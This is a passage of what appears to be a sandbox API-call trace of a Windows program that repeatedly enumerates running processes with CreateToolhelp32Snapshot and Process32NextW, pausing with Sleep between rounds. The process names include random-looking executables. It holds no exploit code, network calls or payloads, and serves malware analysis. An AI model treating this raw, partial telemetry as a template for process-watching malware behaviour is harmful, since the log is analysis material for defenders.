th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.462] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0144.463] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0144.465] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0144.466] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0144.467] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.468] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0144.469] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0144.470] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0144.471] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0144.473] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0144.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0144.475] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0144.476] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0144.477] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0144.478] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0144.479] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0144.480] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0144.487] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0144.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0144.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0144.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0144.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0144.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0144.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0144.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0144.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0144.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0144.499] CloseHandle (hObject=0xc4) returned 1 [0144.499] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0144.504] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.505] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0144.506] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0144.507] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0144.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0144.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0144.510] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0144.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0144.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.515] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0144.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.517] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0144.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0144.520] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0144.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0144.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0144.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0144.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0144.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0144.566] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0144.567] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0144.568] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0144.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0144.571] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0144.572] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0144.573] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0144.574] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0144.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0144.576] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0144.577] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0144.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0144.579] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0144.581] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0144.582] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0144.583] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0144.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0144.585] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0144.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.587] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0144.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0144.589] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0144.590] CloseHandle (hObject=0xbc) returned 1 [0144.590] Sleep (dwMilliseconds=0x12c) [0144.999] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0145.006] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.006] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0145.007] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) 